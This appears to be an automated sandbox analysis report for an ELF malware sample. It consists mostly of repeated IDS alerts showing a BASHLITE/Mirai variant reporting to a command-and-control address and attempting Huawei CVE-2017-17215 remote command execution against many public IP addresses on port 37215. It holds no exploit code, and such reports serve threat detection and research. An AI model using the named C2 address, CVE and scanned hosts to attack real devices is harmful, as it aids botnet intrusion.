              SID:2835222
              Source Port:57074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180214
              SID:2829579
              Source Port:50502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306258
              SID:2835222
              Source Port:60272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606929
              SID:2835222
              Source Port:39290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836057
              SID:2829579
              Source Port:55354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301183
              SID:2835222
              Source Port:46548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786696
              SID:2829579
              Source Port:37200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155692
              SID:2835222
              Source Port:46588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321998
              SID:2835222
              Source Port:33268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074895
              SID:2835222
              Source Port:40504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248529
              SID:2829579
              Source Port:51430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478440
              SID:2829579
              Source Port:40236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.043055
              SID:2829579
              Source Port:58380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832194
              SID:2829579
              Source Port:43576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129779
              SID:2835222
              Source Port:40834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.779763
              SID:2829579
              Source Port:54504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401531
              SID:2829579
              Source Port:46502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786364
              SID:2835222
              Source Port:45686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.479916
              SID:2829579
              Source Port:51526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.324031
              SID:2835222
              Source Port:60464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805867
              SID:2835222
              Source Port:56464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376466
              SID:2829579
              Source Port:49134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300154
              SID:2829579
              Source Port:57808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.149306
              SID:2829579
              Source Port:49500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610008
              SID:2835222
              Source Port:36816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422769
              SID:2829579
              Source Port:50406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610847
              SID:2829579
              Source Port:50656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937319
              SID:2835222
              Source Port:48048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992050
              SID:2835222
              Source Port:37360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889295
              SID:2829579
              Source Port:59278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867803
              SID:2829579
              Source Port:42786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112550
              SID:2829579
              Source Port:60216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408865
              SID:2829579
              Source Port:60574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196069
              SID:2835222
              Source Port:40116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098205
              SID:2829579
              Source Port:40652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.080080
              SID:2835222
              Source Port:39112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423016
              SID:2835222
              Source Port:41162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.934408
              SID:2829579
              Source Port:33186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753354
              SID:2829579
              Source Port:52854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358732
              SID:2829579
              Source Port:48764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454260
              SID:2835222
              Source Port:43510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438825
              SID:2829579
              Source Port:47382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212425
              SID:2829579
              Source Port:37798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275292
              SID:2835222
              Source Port:43184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943799
              SID:2835222
              Source Port:40854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100869
              SID:2829579
              Source Port:38962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172906
              SID:2829579
              Source Port:38984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223387
              SID:2835222
              Source Port:58286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678161
              SID:2835222
              Source Port:43310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697705
              SID:2829579
              Source Port:50408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823722
              SID:2829579
              Source Port:42138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156072
              SID:2835222
              Source Port:40276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137780
              SID:2829579
              Source Port:50550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867872
              SID:2835222
              Source Port:51030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059488
              SID:2835222
              Source Port:42592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636186
              SID:2829579
              Source Port:48404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419861
              SID:2829579
              Source Port:37098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821381
              SID:2829579
              Source Port:42768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376827
              SID:2829579
              Source Port:34450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223823
              SID:2829579
              Source Port:43028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439725
              SID:2829579
              Source Port:55680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544131
              SID:2829579
              Source Port:35294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221931
              SID:2835222
              Source Port:37720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275469
              SID:2829579
              Source Port:46608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268836
              SID:2829579
              Source Port:50036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841556
              SID:2829579
              Source Port:53162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785253
              SID:2835222
              Source Port:42846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409244
              SID:2835222
              Source Port:50682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055931
              SID:2829579
              Source Port:46270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783811
              SID:2829579
              Source Port:54060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888727
              SID:2829579
              Source Port:55888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173564
              SID:2829579
              Source Port:49032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914346
              SID:2835222
              Source Port:55558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060224
              SID:2835222
              Source Port:35034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231687
              SID:2829579
              Source Port:37140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670142
              SID:2835222
              Source Port:59048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710656
              SID:2835222
              Source Port:52258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884453
              SID:2835222
              Source Port:46184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056416
              SID:2829579
              Source Port:56774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729569
              SID:2829579
              Source Port:45296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255458
              SID:2829579
              Source Port:51372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371819
              SID:2829579
              Source Port:48838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157044
              SID:2835222
              Source Port:33432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823878
              SID:2835222
              Source Port:44426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135813
              SID:2829579
              Source Port:57920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101086
              SID:2835222
              Source Port:52588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166856
              SID:2829579
              Source Port:39682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991434
              SID:2835222
              Source Port:60650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654816
              SID:2835222
              Source Port:44688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042639
              SID:2835222
              Source Port:49344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677871
              SID:2829579
              Source Port:60962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610157
              SID:2829579
              Source Port:56028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605638
              SID:2835222
              Source Port:59866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671957
              SID:2829579
              Source Port:42376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167849
              SID:2835222
              Source Port:54794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401385
              SID:2829579
              Source Port:56284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724725
              SID:2829579
              Source Port:46596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090604
              SID:2829579
              Source Port:52128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244830
              SID:2835222
              Source Port:34862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246059
              SID:2829579
              Source Port:59730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016304
              SID:2829579
              Source Port:49586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803694
              SID:2835222
              Source Port:53298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804036
              SID:2835222
              Source Port:40764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096396
              SID:2829579
              Source Port:49642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128811
              SID:2835222
              Source Port:48800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702644
              SID:2829579
              Source Port:35498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752826
              SID:2835222
              Source Port:35142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654361
              SID:2835222
              Source Port:51042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133961
              SID:2835222
              Source Port:44494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256009
              SID:2835222
              Source Port:48554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134024
              SID:2835222
              Source Port:47922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460095
              SID:2829579
              Source Port:40728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039536
              SID:2835222
              Source Port:47070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: i586.elfAvira: detected
              Source: i586.elfReversingLabs: Detection: 71%
              Source: i586.elfJoe Sandbox ML: detected

              Spreading

              barindex
              Source: /tmp/i586.elf (PID: 5537)Opens: /proc/net/routeJump to behavior

              Networking

              barindex
              Source: TrafficSnort IDS: 2840515 ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586) 192.168.2.14:39994 -> 103.82.38.94:4554
              Source: TrafficSnort IDS: 2840516 ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message 103.82.38.94:4554 -> 192.168.2.14:39994
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39676 -> 41.79.20.241:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39676 -> 41.79.20.241:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35226 -> 197.117.40.241:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35226 -> 197.117.40.241:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38996 -> 156.168.223.119:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38996 -> 156.168.223.119:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56444 -> 197.133.36.111:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56444 -> 197.133.36.111:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55684 -> 41.197.172.241:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55684 -> 41.197.172.241:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50552 -> 197.18.235.27:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50552 -> 197.18.235.27:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55030 -> 41.170.30.183:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55030 -> 41.170.30.183:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51436 -> 156.125.211.30:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51436 -> 156.125.211.30:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53474 -> 156.110.128.12:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53474 -> 156.110.128.12:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56612 -> 197.33.124.181:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56612 -> 197.33.124.181:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51938 -> 156.67.239.183:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51938 -> 156.67.239.183:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44200 -> 197.158.27.73:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44200 -> 197.158.27.73:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60300 -> 156.226.12.30:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60300 -> 156.226.12.30:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52174 -> 156.109.0.55:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52174 -> 156.109.0.55:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55670 -> 197.235.8.186:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55670 -> 197.235.8.186:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39284 -> 197.112.240.206:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39284 -> 197.112.240.206:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48870 -> 156.16.175.101:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48870 -> 156.16.175.101:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34522 -> 41.146.71.68:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34522 -> 41.146.71.68:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54734 -> 197.153.88.73:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54734 -> 197.153.88.73:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54602 -> 41.0.201.93:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54602 -> 41.0.201.93:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44058 -> 156.112.241.178:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44058 -> 156.112.241.178:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51936 -> 156.77.138.79:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51936 -> 156.77.138.79:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34128 -> 197.103.12.224:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34128 -> 197.103.12.224:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55352 -> 156.190.186.17:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55352 -> 156.190.186.17:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34040 -> 41.161.235.104:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34040 -> 41.161.235.104:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40620 -> 156.109.2.30:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40620 -> 156.109.2.30:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60334 -> 197.115.185.232:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60334 -> 197.115.185.232:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36646 -> 41.98.170.196:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36646 -> 41.98.170.196:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47784 -> 156.253.22.172:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47784 -> 156.253.22.172:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50734 -> 41.179.176.65:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50734 -> 41.179.176.65:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60740 -> 197.241.131.120:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60740 -> 197.241.131.120:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34148 -> 197.253.168.147:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34148 -> 197.253.168.147:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40264 -> 156.73.77.88:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40264 -> 156.73.77.88:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42580 -> 197.198.156.243:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42580 -> 197.198.156.243:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48344 -> 41.3.135.97:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48344 -> 41.3.135.97:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49782 -> 197.174.148.185:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49782 -> 197.174.148.185:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53772 -> 197.219.160.109:37215
